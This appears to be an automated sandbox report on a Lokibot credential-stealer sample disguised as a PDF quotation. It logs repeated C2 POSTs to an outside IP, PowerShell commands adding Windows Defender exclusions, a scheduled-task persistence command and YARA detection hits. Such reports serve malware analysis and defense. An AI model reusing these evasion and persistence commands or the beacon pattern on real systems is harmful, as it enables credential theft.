                                                                                    Jan 7, 2025 12:33:50.308175087 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:50 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    119192.168.2.45012894.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:50.460906982 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:50.465759039 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:51.191889048 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:51 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    120192.168.2.45012994.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:51.342359066 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:51.347193956 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:52.077549934 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:51 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    121192.168.2.45013094.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:52.217780113 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:52.222675085 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:53.256197929 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:52 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    122192.168.2.45013194.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:53.616158962 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:53.621252060 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:54.360265017 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:54 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    123192.168.2.45013294.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:54.514339924 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:54.519172907 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:55.261075974 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:55 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    124192.168.2.45013394.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:55.408056021 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:55.412869930 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:56.154334068 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:56 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    125192.168.2.45013494.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:56.458128929 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:56.462920904 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:57.175021887 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:57 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    126192.168.2.45013594.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:57.334798098 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:57.340598106 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:58.088736057 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:57 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    127192.168.2.45013694.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:58.234776974 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:58.239631891 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:58.979218006 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:58 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    128192.168.2.45013794.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:59.123577118 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:59.128388882 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:59.832437992 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:59 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    129192.168.2.45013894.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:59.974517107 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:59.979403019 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:34:00.722080946 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:34:00 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    130192.168.2.45013994.156.177.4180
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:34:01.019305944 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:34:01.024157047 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:34:01.830324888 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:34:01 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Click to dive into process behavior distribution

                                                                                    Click to jump to process

                                                                                    Target ID:0
                                                                                    Start time:06:31:54
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\Quotation2025-0107pdf.exe"
                                                                                    Imagebase:0xce0000
                                                                                    File size:725'512 bytes
                                                                                    MD5 hash:FF0A37E1048052C58526A9C38EFC1954
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1720797556.0000000009A00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1714510226.0000000004AC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:06:31:57
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe"
                                                                                    Imagebase:0xb20000
                                                                                    File size:433'152 bytes
                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:06:31:57
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:4
                                                                                    Start time:06:31:57
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mexnJkivovwH.exe"
                                                                                    Imagebase:0xb20000
                                                                                    File size:433'152 bytes
                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:5
                                                                                    Start time:06:31:57
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:6
                                                                                    Start time:06:31:57
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp"
                                                                                    Imagebase:0x430000
                                                                                    File size:187'904 bytes
                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:7
                                                                                    Start time:06:31:57
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:8
                                                                                    Start time:06:31:58
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\Quotation2025-0107pdf.exe"
                                                                                    Imagebase:0x4e0000
                                                                                    File size:725'512 bytes
                                                                                    MD5 hash:FF0A37E1048052C58526A9C38EFC1954
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000008.00000002.2909417745.0000000000A92000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Target ID:9
                                                                                    Start time:06:32:00
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Users\user\AppData\Roaming\mexnJkivovwH.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Roaming\mexnJkivovwH.exe
                                                                                    Imagebase:0x90000
                                                                                    File size:725'512 bytes
                                                                                    MD5 hash:FF0A37E1048052C58526A9C38EFC1954
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
